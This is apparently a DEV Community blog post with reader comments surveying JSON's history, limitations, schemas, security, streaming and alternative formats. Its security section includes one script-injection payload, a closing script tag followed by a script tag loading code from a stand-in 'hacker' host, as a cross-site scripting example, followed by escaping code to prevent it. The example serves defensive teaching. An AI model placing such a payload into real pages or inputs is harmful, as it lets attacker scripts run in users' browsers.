DEV Community

stereobooster

JSON, JSON, JSON

All things about JSON.

Beginning

JSON was born out of a web platform limitation and a bit of creativity. XMLHttpRequest made it possible to send requests to the server without a full page reload, but XML is "heavy" on the wire, so Douglas Crockford came up with a clever trick: use JavaScript Object Notation and eval to pass data between the server and the client in an easy way. But executing arbitrary code with eval is not safe, especially if it comes from a third-party source. So the next step was to standardize the format and implement a dedicated parser for it. Later it became a standard in all browsers, and now we can use it as JSON.parse.

Limitations

Given how it was born, JSON comes with some limitations.

Asymmetric encoding/decoding

You know how JS tries to pretend that type errors don't exist and coerces at any cost, even when it doesn't make much sense. This means that x == JSON.parse(JSON.stringify(x)) (read == as "has the same structure and types") doesn't always hold true. For example:

  • Date is turned into its string representation, and after decoding it stays a string
  • Map, WeakMap, Set, WeakSet are turned into "{}", losing both contents and type
  • BigInt, for a change, throws TypeError: Do not know how to serialize a BigInt
  • a function is converted to undefined (omitted as an object property, null inside an array)
  • undefined is converted to undefined (also omitted as an object property, null inside an array)
  • an instance of an ES6 class or of new function(){} is converted into a plain-object representation and loses its type
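
To make the list above concrete, here is a minimal sketch of a round trip. The roundTrip helper and the field names are made up for this example, and BigInt is left out because it throws instead of producing output.

```typescript
// Hypothetical helper: serialize a value and parse it straight back.
const roundTrip = (value: unknown): unknown => JSON.parse(JSON.stringify(value));

const original = {
  createdAt: new Date(0),          // Date has toJSON(), so it becomes an ISO string
  tags: new Set(["a", "b"]),       // no enumerable own properties, so it becomes {}
  lookup: new Map([["key", 1]]),   // same for Map
  callback: () => 42,              // functions are dropped from objects
  missing: undefined,              // so are undefined properties
  list: [undefined, () => 42],     // inside arrays both become null
};

const copy = roundTrip(original) as Record<string, unknown>;

console.log(copy.createdAt);                        // 1970-01-01T00:00:00.000Z (a string now)
console.log(JSON.stringify(copy.tags));             // {}
console.log(JSON.stringify(copy.lookup));           // {}
console.log("callback" in copy, "missing" in copy); // false false
console.log(JSON.stringify(copy.list));             // [null,null]
```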

Solution: one possible solution is to use a static type system like TypeScript or Flow to prevent asymmetric types:

// inspired by https://github.com/tildeio/ts-std/blob/master/src/json.ts
export type JSONValue =
  | string
  | number
  | boolean
  | null
  | JSONObject
  | JSONArray;
type JSONObject = {[key: string]: JSONValue};
type JSONArray = Array<JSONValue>;

export const symetricStringify = (x: JSONValue) => JSON.stringify(x);

It will not save us from TypeError: Converting circular structure to JSON, though; we will get to that later.
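
For reference, a minimal sketch of how that error shows up. The TreeNode type and the variable names are invented for this example; the point is only that a type describes shape, not whether two references point at the same object.

```typescript
// Hypothetical tree shape where a child points back to its parent
type TreeNode = { label: string; parent: TreeNode | null; children: TreeNode[] };

const root: TreeNode = { label: "root", parent: null, children: [] };
const child: TreeNode = { label: "child", parent: root, children: [] };
root.children.push(child); // root -> child -> root is now a cycle

let caught: unknown = null;
try {
  JSON.stringify(root);
} catch (error) {
  caught = error; // JSON.stringify throws a TypeError on circular structures
}

console.log(caught instanceof TypeError); // true
```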

Security: script injection

If you use JSON to pass data from the server to the client inside HTML (for example, the initial value for a Redux store with server-side rendering, or gon in Ruby), be aware that there is a risk of a script injection attack:

<script>
  var data = {user_input: "</script><script src=http://hacker/script.js>"}
</script>

Solution: escape JSON before passing it to HTML

const UNSAFE_CHARS_REGEXP = /[<>\/\u2028\u2029]/g;
// Mapping of unsafe HTML and invalid JavaScript line terminator chars to their
// Unicode char counterparts which are safe to use in JavaScript strings.
const ESCAPED_CHARS = {
  "<": "\\u003C",
  ">": "\\u003E",
  "/": "\\u002F",
  "\u2028": "\\u2028",
  "\u2029": "\\u2029"
};
const escapeUnsafeChars = unsafeChar => ESCAPED_CHARS[unsafeChar];
const escape = str => str.replace(UNSAFE_CHARS_REGEXP, escapeUnsafeChars);
export const safeStringify = (x) => escape(JSON.stringify(x));
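
A quick way to see the effect of the escaping is to count closing script tags in the generated HTML. This is only a sketch: escapeForScriptTag restates the same idea as the code above so the example is self-contained, and countClosingTags is a made-up helper.

```typescript
// Same escaping idea as above: replace unsafe characters with \uXXXX escapes
const escapeForScriptTag = (json: string): string =>
  json.replace(/[<>\/\u2028\u2029]/g, (ch) =>
    "\\u" + ("0000" + ch.charCodeAt(0).toString(16)).slice(-4));

const state = { user_input: "</script><script src=http://hacker/script.js>" };

const unsafeHtml = `<script>var data = ${JSON.stringify(state)}</script>`;
const safeHtml = `<script>var data = ${escapeForScriptTag(JSON.stringify(state))}</script>`;

// Hypothetical helper: how many times does the closing tag appear?
const countClosingTags = (html: string): number => html.split("</script>").length - 1;

console.log(countClosingTags(unsafeHtml)); // 2 (the payload closes the tag early)
console.log(countClosingTags(safeHtml));   // 1 (only the real closing tag is left)

// The escaped text is still valid JSON and decodes to the original value
const decoded = JSON.parse(escapeForScriptTag(JSON.stringify(state))) as typeof state;
console.log(decoded.user_input === state.user_input); // true
```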

Side note: collection of JSON implementation vulnerabilities

Lack of schema

JSON is schemaless, which makes sense because JS is dynamically typed. But this means that you need to verify the shape (types) yourself; JSON.parse won't do it for you.

Solution: I wrote about this problem before - use IO validation
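
As a rough idea of what such validation looks like without any library, here is a hand-written type guard. The User shape, isUser and parseUser are hypothetical names for this sketch; validation libraries derive checks like this from a schema instead of writing them by hand.

```typescript
// Hypothetical shape we expect from the server
type User = { id: number; name: string };

// Runtime check that narrows unknown to User
const isUser = (value: unknown): value is User => {
  if (typeof value !== "object" || value === null) return false;
  const record = value as Record<string, unknown>;
  return typeof record.id === "number" && typeof record.name === "string";
};

// Parse and validate in one step, so the rest of the code can trust the type
const parseUser = (source: string): User => {
  const parsed: unknown = JSON.parse(source);
  if (!isUser(parsed)) throw new Error("Payload does not match the User shape");
  return parsed;
};

console.log(parseUser('{"id":1,"name":"Ada"}').name); // Ada
```

Calling parseUser('{"id":"1"}') throws instead of letting a wrongly shaped object leak into the application.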

Side note: there are also other solutions, like JSON API, Swagger, and GraphQL.

Lack of schema and serializer/parser

Having a schema for the parser can solve the asymmetry issue for Date. If we know that we expect a Date at some place, we can use the string representation to create a JS Date out of it.

Having a schema for the serializer can solve the issue for BigInt, Map, Set, ES6 classes and new function(){} (WeakMap and WeakSet cannot be enumerated, so only their type can be preserved, not their contents). We can provide a specific serializer/parser for each type.

import * as t from 'io-ts'

const DateFromString = new t.Type<Date, string>(
  'DateFromString',
  (m): m is Date => m instanceof Date,
  (m, c) =>
    t.string.validate(m, c).chain(s => {
      const d = new Date(s)
      return isNaN(d.getTime()) ? t.failure(s, c) : t.success(d)
    }),
  a => a.toISOString()
)
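
The same idea can be sketched without a library using the replacer and reviver arguments of JSON.stringify and JSON.parse. The "$type" tag and the entries field are an encoding invented for this example, not a standard.

```typescript
// Hypothetical tagged encoding for Map: { "$type": "Map", "entries": [[key, value], ...] }
const replacer = (_key: string, value: unknown): unknown =>
  value instanceof Map ? { $type: "Map", entries: Array.from(value.entries()) } : value;

// Turn tagged objects back into Map instances while parsing
const reviver = (_key: string, value: unknown): unknown => {
  if (typeof value === "object" && value !== null) {
    const tagged = value as { $type?: unknown; entries?: unknown };
    if (tagged.$type === "Map" && Array.isArray(tagged.entries)) {
      return new Map(tagged.entries as [unknown, unknown][]);
    }
  }
  return value;
};

const encoded = JSON.stringify({ scores: new Map([["alice", 1], ["bob", 2]]) }, replacer);
const restored = JSON.parse(encoded, reviver) as { scores: Map<string, number> };

console.log(restored.scores instanceof Map); // true
console.log(restored.scores.get("bob"));     // 2
```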

Side note: see also this proposal

Lack of schema and performance

Having a schema can improve the performance of the parser. For example, see jitson and FAD.js.

Side note: see also fast-json-stringify
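
To give a feeling for why a schema helps, here is a toy serializer that is specialised for one flat shape ahead of time. It is a sketch under simple assumptions (flat records, finite numbers) and does not claim to show how the libraries mentioned above work internally; compileStringify and the schema format are made up.

```typescript
type FieldType = "string" | "number" | "boolean";
type FlatSchema = { [field: string]: FieldType };
type FlatRecord = { [field: string]: string | number | boolean };

// Hypothetical compiler: turns a flat schema into a specialised stringify function
const compileStringify = (schema: FlatSchema) => {
  const fields = Object.keys(schema).map((field) => ({
    field,
    prefix: JSON.stringify(field) + ":",   // keys are quoted once, up front
    isString: schema[field] === "string",  // only strings need escaping later
  }));
  return (record: FlatRecord): string =>
    "{" +
    fields
      .map(({ field, prefix, isString }) =>
        prefix + (isString ? JSON.stringify(record[field]) : String(record[field])))
      .join(",") +
    "}";
};

const stringifyPoint = compileStringify({ label: "string", x: "number", visible: "boolean" });
const pointJson = stringifyPoint({ label: "a", x: 1, visible: true });

console.log(pointJson); // {"label":"a","x":1,"visible":true}
```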

Stream parser/serializer

When JSON was invented, nobody thought about using it for gigabytes of data. If you want to do something like this, take a look at a streaming parser.

You can also use a JSON stream to improve UX with a slow backend: see oboejs.
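
A real streaming parser works token by token on a single huge document. As a much simpler sketch of the incremental idea, assume the data arrives as newline-delimited JSON (one document per line); the class and method names below are hypothetical.

```typescript
// Hypothetical incremental parser for newline-delimited JSON
class LineDelimitedJsonParser {
  private buffer = "";
  private readonly onValue: (value: unknown) => void;

  constructor(onValue: (value: unknown) => void) {
    this.onValue = onValue;
  }

  // Feed a chunk of text as it arrives; complete lines are parsed right away
  write(chunk: string): void {
    this.buffer += chunk;
    const lines = this.buffer.split("\n");
    this.buffer = lines.pop() ?? ""; // keep the trailing partial line for later
    for (const line of lines) {
      if (line.trim() !== "") this.onValue(JSON.parse(line));
    }
  }

  // Call when the stream ends to flush the last line
  end(): void {
    if (this.buffer.trim() !== "") this.onValue(JSON.parse(this.buffer));
    this.buffer = "";
  }
}

const received: unknown[] = [];
const lineParser = new LineDelimitedJsonParser((value) => received.push(value));
lineParser.write('{"id":1}\n{"id"'); // the second document is cut in the middle
lineParser.write(':2}\n{"id":3}');
lineParser.end();

console.log(received.length); // 3
```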

Beyond JSON

uneval

If you want to serialize actual JS code and preserve types, references and cyclic structures, JSON will not be enough. You will need "uneval". Check out some of those:

Other "variations to this tune":

  • LJSON - JSON extended with pure functions
  • serialize-javascript - Serialize JavaScript to a superset of JSON that includes regular expressions, dates and functions
  • arson - Efficient encoder and decoder for arbitrary objects
  • ResurrectJS - preserves object behavior (prototypes) and reference circularity with a special JSON encoding
  • serializr - Serialize and deserialize complex object graphs to and from JSON and Javascript classes

As a configuration file

JSON was invented to transmit data, not to store configuration. Yet people use it for configuration because it is an easy option.

JSON lacks comments, requires quotes around keys, prohibits a comma at the end of an array or dictionary, and requires paired {} and []. There is no real solution for this except to use another format, like JSON5, YAML or TOML.
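
A small sketch of those restrictions in action; isValidJson is a made-up helper that only reports whether JSON.parse accepts the text.

```typescript
// Hypothetical helper: does JSON.parse accept this text?
const isValidJson = (source: string): boolean => {
  try {
    JSON.parse(source);
    return true;
  } catch {
    return false;
  }
};

console.log(isValidJson('{"port": 8080}'));             // true
console.log(isValidJson('{"port": 8080,}'));            // false: trailing comma
console.log(isValidJson('{port: 8080}'));               // false: unquoted key
console.log(isValidJson('{"port": 8080} // dev port')); // false: comment
```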

Binary data

JSON is more compact than XML, yet not the most compact. Binary formats are even more efficient. Check out MessagePack.
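
To get a feeling for the size difference, here is a toy encoder for a tiny subset of the MessagePack format (nil, booleans, integers 0..127, short ASCII strings, small arrays and maps). It is a sketch for illustration only; encodeSmall and the Small type are made up, and real code should use a MessagePack library.

```typescript
type Small = null | boolean | number | string | Small[] | { [key: string]: Small };

// Hypothetical encoder for a small MessagePack subset; anything else throws
const encodeSmall = (value: Small): number[] => {
  if (value === null) return [0xc0];                              // nil
  if (typeof value === "boolean") return [value ? 0xc3 : 0xc2];   // true / false
  if (typeof value === "number") {
    if (Math.floor(value) !== value || value < 0 || value > 127) {
      throw new RangeError("number outside the supported subset");
    }
    return [value];                                               // positive fixint
  }
  if (typeof value === "string") {
    if (value.length > 31 || /[^\x00-\x7f]/.test(value)) {
      throw new RangeError("string outside the supported subset");
    }
    const header = [0xa0 | value.length];                         // fixstr
    return header.concat(value.split("").map((ch) => ch.charCodeAt(0)));
  }
  if (Array.isArray(value)) {
    if (value.length > 15) throw new RangeError("array outside the supported subset");
    const items: Small[] = value;
    return items.reduce<number[]>(
      (bytes, item) => bytes.concat(encodeSmall(item)),
      [0x90 | items.length]                                       // fixarray
    );
  }
  const entries = value;
  const keys = Object.keys(entries);
  if (keys.length > 15) throw new RangeError("map outside the supported subset");
  return keys.reduce<number[]>(
    (bytes, key) => bytes.concat(encodeSmall(key), encodeSmall(entries[key])),
    [0x80 | keys.length]                                          // fixmap
  );
};

const sample = { compact: true, schema: 0 };
const packed = encodeSmall(sample);

console.log(packed.length);                 // 18 bytes
console.log(JSON.stringify(sample).length); // 27 bytes
```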

Side note: GraphQL is not tied to JSON, so you can use MessagePack with GraphQL.

Binary data and schema

Having a binary format with a schema allows some crazy optimizations, like random access or zero-copy. Check out Cap'n Proto.

Query language

JSON (like anything JS related) is super popular, so people work with it more and more and have started to build tools around it, like JSONPath and jq.
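
The basic idea behind such tools can be sketched as a path lookup. Note that getPath and its dot-separated syntax are made up for this example; this is neither JSONPath nor jq syntax, both of which are far richer.

```typescript
// Hypothetical helper: follow a dot-separated path such as "store.books.1.title"
const getPath = (data: unknown, path: string): unknown =>
  path.split(".").reduce<unknown>((current, key) => {
    if (typeof current !== "object" || current === null) return undefined;
    return (current as Record<string, unknown>)[key];
  }, data);

const catalog: unknown = JSON.parse('{"store":{"books":[{"title":"A"},{"title":"B"}]}}');

console.log(getPath(catalog, "store.books.1.title")); // B
console.log(getPath(catalog, "store.missing.title")); // undefined
```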

Did I miss something?

Leave a comment if I missed something. Thanks for reading.


Follow me on twitter and github.

Top comments (11)

Jaimie Malvi • Edited

Very well written article Stereobooster. : )

I love JSON and how it's easy to use. I also like to suggest few tools and article which helps lovers of JSON .

jsonformatter.org . it's all in one JSON tool.

codebeautify.org/jsonvalidator . It's json validator

codeblogmoney.com/what-is-json/

I hope this help.

nalani5210

JSON brings great convenience to network transmission, but when JSON data is very long, it will make people fall into tedious and complicated data node search.
Many online websites can solve this problem:)
jsonformatting.com/jsonformat

tux0r

MessagePack is lovely (but hard to read as a human). Another format with less overhead are Lisp's S-expressions. 🙂

stereobooster

I'll just leave it here

s-expression

(document author: "paul@prescod.net"
  (para "This is a paragraph " (footnote "(better than the one under there)") ".")
  (para "Ha! I made you say \"underwear\"."))

JSON

["document", "author", "paul@prescod.net",
  ["para", "This is a paragraph ", ["footnote", "(better than the one under there)"], "."],
  ["para", "Ha! I made you say \"underwear\"."]]

XML

<document author="paul@prescod.net">
  <para>This is a paragraph <footnote>(just a little one)</footnote>.</para>
  <para>Ha! I made you say "underwear".</para>
</document>
 
Erebos Manannán • Edited

I really hope you wouldn't use arrays to represent that kind of a structure, when it's clearly insane. Data structures should be designed for representing data and preventing invalid state, not looking pretty on your screen.

This is what that XML would actually translate to in JSON to have semantically similar meaning, and that would be as easy for computers to parse without errors:

{
  "author": "paul@prescod.net",
  "children": [
    {"type": "paragraph", "children": [
      {"type": "footnote", "text": "(better than the one under there)."}
    ]},
    {"type": "paragraph", "text": "Ha! I made you say \"underwear\"."}
  ]
}

Doesn't look so condensed anymore, now does it?

Also, which one of these is the easiest for a human eye to read? The XML.

stereobooster

I really hope you wouldn't use arrays to represent that kind of a structure, when it's clearly insane.

You know this is not an actual argument, right?

Data structures should be designed for representing data and preventing invalid state, not looking pretty on your screen.

JSON is not a data structure, it is a serialisation format. A serialisation format is judged on speed of serialisation/deserialisation, ability to be stream parsed, ability to do random reads, ability to encode cyclic dependencies etc.

Given example just demonstrates how s-expressions would look like in JSON. If you wonder what is real life example of usage - one is istf-spec

[
  [RULE_START, 1],
    [SELECTOR, '.foo'],
    [PROPERTY, 'color'],
    [VALUE, 'red'],
  [RULE_END],
  [PARTIAL_REF, () => [
    [RULE_START, 1],
      [SELECTOR, '.partial'],
      [PROPERTY, 'color'],
      [VALUE, 'green'],
    [RULE_END],    
  ]]
]

XML in given example is just a reference to the fact that it has roots in s-expression (this is kind of joke).

Erebos Manannán

Given example just demonstrates how s-expressions would look like in JSON.

Given example didn't exactly come with a disclaimer. It is a s-expression vs. JSON vs. XML without much context, and in that example it looks like you're trying to desperately find a way to represent the XML in two formats that really are not suitable for representing that data.

stereobooster

Yes it is s-expression vs. JSON vs. XML, but I didn't draw any conclusions or anything like this. This is not a post where I claim one technology is total winner. I just had a chit-chat with tux0r. I'm not sure what exactly assaulted you

tux0r

I still prefer parentheses!

Code Beautify

Nice article.
Just in case someone needs a codebeautify.net/json/validator

cyr1l

JSON schema allows to validate JSON data: